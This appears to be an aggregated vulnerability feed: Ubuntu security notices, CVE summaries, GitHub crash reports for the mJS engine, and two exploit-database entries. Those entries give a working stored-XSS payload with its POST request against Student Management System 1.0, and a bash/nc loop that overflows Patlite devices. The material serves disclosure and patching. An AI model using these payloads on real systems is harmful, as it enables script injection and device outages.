Ubuntu Security Notice 5538-1 - It was discovered that libtirpc incorrectly handled certain inputs. An attacker could possibly use this issue to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5538-1  
July 28, 2022

libtirpc vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

libtirpc could be made to denial of service if it received a specially  
crafted input.

Software Description:  
- libtirpc: transport-independent RPC library - common files

Details:

It was discovered that libtirpc incorrectly handled certain inputs.  
An attacker could possibly use this issue to cause a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  libtirpc3                       1.3.2-2ubuntu0.1

Ubuntu 20.04 LTS:  
  libtirpc3                       1.2.5-1ubuntu0.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5538-1  
  CVE-2021-46828

Package Information:  
  https://launchpad.net/ubuntu/+source/libtirpc/1.3.2-2ubuntu0.1  
  https://launchpad.net/ubuntu/+source/libtirpc/1.2.5-1ubuntu0.1

Ubuntu Security Notice USN-5538-1

Ubuntu Security Notice 5537-1 - Multiple security issues were discovered in MySQL and this update includes new upstream MySQL versions to fix these issues. MySQL has been updated to 8.0.30 in Ubuntu 20.04 LTS and Ubuntu 22.04 LTS. Ubuntu 18.04 LTS has been updated to MySQL 5.7.39. In addition to security fixes, the updated packages contain bug fixes, new features, and possibly incompatible changes.

    ==========================================================================Ubuntu Security Notice USN-5537-1July 28, 2022mysql-5.7, mysql-8.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in MySQL.Software Description:- mysql-8.0: MySQL database- mysql-5.7: MySQL databaseDetails:Multiple security issues were discovered in MySQL and this update includesnew upstream MySQL versions to fix these issues.MySQL has been updated to 8.0.30 in Ubuntu 20.04 LTS and Ubuntu 22.04 LTS.Ubuntu 18.04 LTS has been updated to MySQL 5.7.39.In addition to security fixes, the updated packages contain bug fixes, newfeatures, and possibly incompatible changes.Please see the following for more information:https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-39.htmlhttps://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-30.htmlhttps://www.oracle.com/security-alerts/cpujul2022.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  mysql-server-8.0                8.0.30-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  mysql-server-8.0                8.0.30-0ubuntu0.20.04.2Ubuntu 18.04 LTS:  mysql-server-5.7                5.7.39-0ubuntu0.18.04.2This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:  https://ubuntu.com/security/notices/USN-5537-1  CVE-2022-21509, CVE-2022-21515, CVE-2022-21517, CVE-2022-21522,  CVE-2022-21525, CVE-2022-21526, CVE-2022-21527, CVE-2022-21528,  CVE-2022-21529, CVE-2022-21530, CVE-2022-21531, CVE-2022-21534,  CVE-2022-21537, CVE-2022-21538, CVE-2022-21539, CVE-2022-21547,  CVE-2022-21553, CVE-2022-21569Package Information:  https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.30-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/mysql-8.0/8.0.30-0ubuntu0.20.04.2  https://launchpad.net/ubuntu/+source/mysql-5.7/5.7.39-0ubuntu0.18.04.2

Ubuntu Security Notice USN-5537-1

In zulip before 1.3.12, bot API keys were accessible to other users in the same realm.

CVE-2016-4426: Version History — Zulip 2.1.7 documentation

Ubuntu Security Notice 5535-1 - Joseph Nuzman discovered that some Intel processors did not properly initialise shared resources. A local attacker could use this to obtain sensitive information. Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel processors did not prevent test and debug logic from being activated at runtime. A local attacker could use this to escalate privileges.

==========================================================================  
Ubuntu Security Notice USN-5535-1  
July 28, 2022

Intel Microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

Joseph Nuzman discovered that some Intel processors did not properly  
initialise shared resources. A local attacker could use this to obtain  
sensitive information. (CVE-2021-0145)

Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel  
processors did not prevent test and debug logic from being activated at  
runtime. A local attacker could use this to escalate  
privileges. (CVE-2021-0146)

It was discovered that some Intel processors did not implement sufficient  
control flow management. A local attacker could use this to cause a denial  
of service (system crash). (CVE-2021-0127)

It was discovered that some Intel processors did not completely perform  
cleanup actions on multi-core shared buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21123,  
CVE-2022-21127)

It was discovered that some Intel processors did not completely perform  
cleanup actions on microarchitectural fill buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21125)

Alysa Milburn, Jason Brandt, Avishai Redelman and Nir Lavi discovered that  
some Intel processors improperly optimised security-critical code. A local  
attacker could possibly use this to expose sensitive  
information. (CVE-2022-21151)

It was discovered that some Intel processors did not properly perform  
cleanup during specific special register write operations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2022-21166)

It was discovered that some Intel processors did not properly restrict  
access in some situations. A local attacker could use this to obtain  
sensitive information. (CVE-2021-33117)

Brandon Miller discovered that some Intel processors did not properly  
restrict access in some situations. A local attacker could use this to  
obtain sensitive information or a remote attacker could use this to  
cause a denial of service (system crash). (CVE-2021-33120)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
intel-microcode 3.20220510.0ubuntu0.16.04.1+esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-5535-1  
CVE-2021-0127, CVE-2021-0145, CVE-2021-0146, CVE-2021-33117,  
CVE-2021-33120, CVE-2022-21123, CVE-2022-21125, CVE-2022-21127,  
CVE-2022-21151, CVE-2022-21166

Ubuntu Security Notice USN-5535-1

A stored cross-site scripting (XSS) vulnerability in /nav_bar_action.php of Student Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Chat box.

    # Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)
    # Date: 2021-05-13
    # Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com
    # Vendor Homepage: https://github.com/amirhamza05/Student-Management-System
    # Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip
    # Version: 1.0
    # Tested on: ubuntu 20.04.2
    
    # --- Description --- #
    
    # The web application allows for an  Attacker to inject persistent Cross-Site-Scripting payload in Live Chat. 
    
    
    # --- Proof of concept --- #
    
    1- Login to Student Management System
    2- Click on Live Chat button
    3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image>
    5- Xss popup will be triggered.
    
    
    # --- Malicious Request --- #
    
    POST /nav_bar_action.php HTTP/1.1
    Host: (HOST)
    Cookie: (PHPSESSID)
    Content-Length: 96
    
    send_message_chat%5Bmessage%5D=<image src=1 onerror="javascript:alert(document.domain)"></image>

CVE-2021-33371: Offensive Security’s Exploit Database Archive

Ubuntu Security Notice 5532-1 - It was discovered that Bottle incorrectly handled errors during early request binding. An attacker could possibly use this issue to disclose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-5532-1  
July 26, 2022

python-bottle vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Bottle could be made to leak sensitive information if it received a specially  
crafted request.

Software Description:  
- python-bottle: fast and simple WSGI-framework for Python

Details:

It was discovered that Bottle incorrectly handled errors during early request   
binding. An attacker could possibly use this issue to disclose sensitve   
information. (CVE-2022-31799)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  python3-bottle                  0.12.19-1+deb11u1build0.22.04.1

Ubuntu 20.04 LTS:  
  python3-bottle                  0.12.15-2.1ubuntu0.2

Ubuntu 18.04 LTS:  
  python-bottle                   0.12.13-1ubuntu0.2  
  python3-bottle                  0.12.13-1ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5532-1  
  CVE-2022-31799

Package Information:  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.19-1+deb11u1build0.22.04.1  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.15-2.1ubuntu0.2  
  https://launchpad.net/ubuntu/+source/python-bottle/0.12.13-1ubuntu0.2

Ubuntu Security Notice USN-5532-1

An issue was discovered in mjs(mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow at 0x7fffe9049390.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Clingto opened this issue

May 19, 2021

· 0 comments

**Comments**

System info:  
Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5)  
Compile Command:

    $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs
    

Run Command:

POC file:  
https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-module-stack-overflow

ASAN info:

ASAN:SIGSEGV
=================================================================
==10560\==ERROR: AddressSanitizer: stack-overflow on address 0x7fffe9049390 (pc 0x7fffe9049390 bp 0x00000042572b sp 0x7fffe9049348 T0)
    #0 0x7fffe904938f  (<unknown module>)

SUMMARY: AddressSanitizer: stack-overflow ??:0 ??
==10560\==ABORTING

1 participant

CVE-2021-33448: AddressSanitizer: stack-buffer-overflow in <unknown module> · Issue #170 · cesanta/mjs

An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There are memory leaks in frozen_cb() in mjs.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open

Clingto opened this issue

May 19, 2021

· 0 comments

**Comments**

System info:  
Ubuntu 16.04.6 LTS, X64, gcc 5.4.0, mjs (latest master 4c870e5)  
Compile Command:

    $ gcc -fsanitize=address -fno-omit-frame-pointer -DMJS_MAIN mjs.c -ldl -g -o mjs
    

Run Command:

POC file:  
https://github.com/Clingto/POC/blob/master/MSA/mjs/mjs-5794-frozen\_cb-memory-leak

ASAN info:

\==29407\==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 37331 byte(s) in 1 object(s) allocated from:
    #0 0x7f151fe52602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42ffcd in frozen\_cb  test/mjs-uaf/build\_asan/mjs.c:12025
    #2 0x4092c4 in json\_parse\_string  test/mjs-uaf/build\_asan/mjs.c:5898
    #3 0x40b482 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:5993
    #4 0x40aa25 in json\_parse\_array  test/mjs-uaf/build\_asan/mjs.c:5958
    #5 0x40b4c4 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:6000
    #6 0x40b863 in json\_parse\_pair  test/mjs-uaf/build\_asan/mjs.c:6058
    #7 0x40bc63 in json\_parse\_object  test/mjs-uaf/build\_asan/mjs.c:6070
    #8 0x40b4a3 in json\_parse\_value  test/mjs-uaf/build\_asan/mjs.c:5996
    #9 0x40c135 in json\_doit  test/mjs-uaf/build\_asan/mjs.c:6083
    #10 0x40f2aa in json\_walk  test/mjs-uaf/build\_asan/mjs.c:6466
    #11 0x4309d9 in mjs\_json\_parse  test/mjs-uaf/build\_asan/mjs.c:12133
    #12 0x430f11 in mjs\_op\_json\_parse  test/mjs-uaf/build\_asan/mjs.c:12193
    #13 0x42572a in mjs\_execute  test/mjs-uaf/build\_asan/mjs.c:9648
    #14 0x4265f1 in mjs\_exec\_internal  test/mjs-uaf/build\_asan/mjs.c:9866
    #15 0x426873 in mjs\_exec\_file  test/mjs-uaf/build\_asan/mjs.c:9889
    #16 0x431348 in main  test/mjs-uaf/build\_asan/mjs.c:12228
    #17 0x7f151f80c82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: 37331 byte(s) leaked in 1 allocation(s).

1 participant

CVE-2021-33437: AddressSanitizer: 1 memory leaks of frozen_cb() · Issue #160 · cesanta/mjs

Ubuntu Security Notice 5530-1 - It was discovered that PHP incorrectly handled certain memory operations when obtaining file information. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5530-1July 25, 2022php8.1 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:PHP could be made to crash or run programs if it processed speciallycrafted data.Software Description:- php8.1: HTML-embedded scripting language interpreterDetails:It was discovered that PHP incorrectly handled certain memory operationswhen obtaining file information. A remote attacker could use this issue tocause PHP to crash, resulting in a denial of service, or possibly executearbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  libapache2-mod-php8.1           8.1.2-1ubuntu2.2  php8.1-cgi                      8.1.2-1ubuntu2.2  php8.1-cli                      8.1.2-1ubuntu2.2  php8.1-fpm                      8.1.2-1ubuntu2.2  php8.1-mysql                    8.1.2-1ubuntu2.2  php8.1-pgsql                    8.1.2-1ubuntu2.2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5530-1  CVE-2022-31627Package Information:  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.2

Ubuntu Security Notice USN-5530-1

Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.

    # Exploit Title: CVE-2022-35911 - Patlite Overflow.# Date: 2022-07-07# Exploit Author: Samy Younsi - Necrum Security Labs# Vendor Homepage: https://www.patlite.co.jp# Software Link: https://www.patlite.co.jp/product/detail0000021462.html# Version: Versions 1.46 and bellow are affected# Tested on: CentOs & Ubuntu# CVE : CVE-2022-35911#!/bin/bashIP="192.168.1.101"PORT="80"for i in {0..1000}; do   echo "[$i]: ";   echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; done > /dev/null 2>&1

Tag

#ubuntu